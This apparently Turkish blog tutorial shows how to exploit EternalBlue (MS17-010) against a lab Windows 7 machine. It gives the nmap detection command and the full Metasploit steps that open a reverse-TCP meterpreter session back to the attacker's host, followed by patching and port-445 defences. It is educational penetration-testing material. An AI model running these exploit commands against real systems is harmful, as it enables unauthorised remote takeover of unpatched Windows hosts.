ETERNALBLUE (MS17-010) ZAFİYETİ SIZMA TESTİ

Bugün bu yazıda ETERNALBLUE Exploit ile Metasploit kullanarak Windows 7 işletim sistemi kullanan bir bilgisayardan hak elde etme yöntemini öğreneceğiz.

Bu yazı tamamen eğitim amaçlı olup, yasa dışı bir faaliyet için kesinlikle KULLANILMAMALIDIR.

Peki, ETERNALBLUE Nedir?

EternalBlue Kötü Amaçlı Yazılım Ulusal Güvenlik Ajansı (NSA) tarafından geliştirilen ve Windows tabanlı Sunucu Mesaj Bloğunu (SMBv1) kullanan ve aracın Shadow Brokers korsanları Grubu tarafından Nisan 2017’de piyasaya sürüldüğüne ve Wannacry Cyber ​​Attack için kullanıldığına inanılması için geliştirilmiştir.

Doublepulsar bize bir Windows sistemlerine arka kapı (backdoor) erişimi sağlamada yardımcı oluyor.

NSA’nın yayınladığı verilere göre hedeflenen Windows sistemler başlıca şunlardır;

  • Windows Server 2003 SP0 (x86)
  • Windows XP (all services pack) (x86) (x64)
  • Windows Server 2003 SP1/SP2 (x86)
  • Windows Server 2003 (x64)
  • Windows Vista (x86)
  • Windows Vista (x64)
  • Windows Server 2008 (x86)
  • Windows 7 (all services pack) (x86) (x64)
  • Windows Server 2008 R2 (x86) (x64)

Biz bu eğitim içeriğinde hedef olarak Windows 7 işletim sistemini seçeceğiz. Windows 7 işletim sistemine uzaktan erişebiliriz ve hedefe herhangi bir casus yazılım veya yük (payload) yüklememize gerek yok.

Öyleyse başlayalım 🙂

Saldırgan Makine: Kali Linux – [IP Adresi: 192.168.69.138]

(Başka bir penetrasyon testi işletim sistemi kullanabilirsiniz.)

Kurban Makine: Windows 7 – [IP Adresi: 192.168.69.146]

Gerçekleştireceğimiz sızma testi örneğinde gereken işletim sistemlerini Vmware Workstation 15 kullanarak bilgisayarda sanal olarak oluşturdum. Siz de gereken işletim sistemlerini sanal makinede kurabilirsiniz.

Vmware sanal makine için gerekli imajları aşağıdaki linklerden ulaşabilirsiniz.

Kali Linux – https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

Windows 7 – https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Hedef Tespiti

İlk olarak hedef makinada bu açığın olup olmadığını anlamak için küçük bir nmap aracını kullanacağız. MS017-010 exploitinin kontrolü için Kali Linux terminalimize aşağıdaki komutu yazıyoruz.

nmap -p445 --script smb-vuln-ms17-010 192.168.69.146(hedef bilgisayar IP)

Bu açıklık smb 445 portundan kaynaklanmaktadır. Tarama sonucunda ms17-010 açıklığının olduğu anlaşılmış oldu.

Açığın varlığının tespiti için yapılan nmap taraması.
Nmap Taraması

Hedef bilgisayarımızda açıklığın olduğu tespit edildikten sonra Metasploit aracını kullanarak açıklığı exploit etme işlemlerine geçebiliriz.

Metasploit ile Saldırı

Bu işlemler tamamlandıktan sonra Metasploit aracını açıp işlemlerimize devam ediyoruz. Bunun için aşağıdaki komutu teminalde çalıştırmamız yeterli olacaktır.

msfconsole
Metasploit aracı açılış ekranı.
Metasploit Aracı

Kullanacağımız exploiti msfconsole’da başlatarak işlemlere devam etmeliyiz. Kullanacağımız exploit açıldıktan sonra gereken bilgiler girilmelidir. Bunlar hedef bilgisayarın IP’si (rhost), saldırgan bilgisayarın (kendi bilgisayarımızın) IP’si (lhost),  oturum (session) açabilmek için gereken payload. Bunlar için terminalde aşağıdaki komutları çalıştırmalıyız.

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.69.146

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.69.138

Exploit için gerekli işlemler.

Tüm bu girilen bilgilerin kontrolünü aşağıdaki komutu yazarak sağlayabiliriz.

show options

Exploit için yapılan işlemlerin kontrolü.

Daha sonra komut satırına run yada exploit komutlarından birini yazarak exploiti çalıştırabiliriz.

Exploit'in çalıştırılması.

Görüldüğü gibi hedef bilgisayarımızda bir session açılarak bize meterpreter üzerinden hedef ile alakalı işlemler yapmamıza olanak sağladı. Daha sonra “sysinfo” yazarak hedef bilgisayar hakkında bilgi sahibi olabiliriz.

Wanacry (MS17-010) Açığından Korunma Yöntemleri

Kullanılan Microsoft Windows işletim sistemlerinin güncellemelerini kontrol edip 14 Mart 2017’de yayınlanan MS17-010 kodlu yamanın yüklendiğinden emin olunması gereklidir. (https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/)

İnternete hizmet veren sistemlerinizdeki 445/TCP portunun kapatılması gerekmektedir.

Tüm ağ noktalarında güvenlik çözümlerinin aktif olduğundan emin olun.

Davranışsal proaktif bir tespit bileşeni olan ve güncel imza veritabanına sahip güvenlik yazılımı kullanın. Böylece bir virüs taraması gerçekleştirin.

İnternete açık sunucularınızda MS17-010 zafiyetinin olup olmadığını http://ms17-10.com üzerinden de online olarak ücretsiz bir şekilde test edebilirsiniz.

Bir Cevap Yazın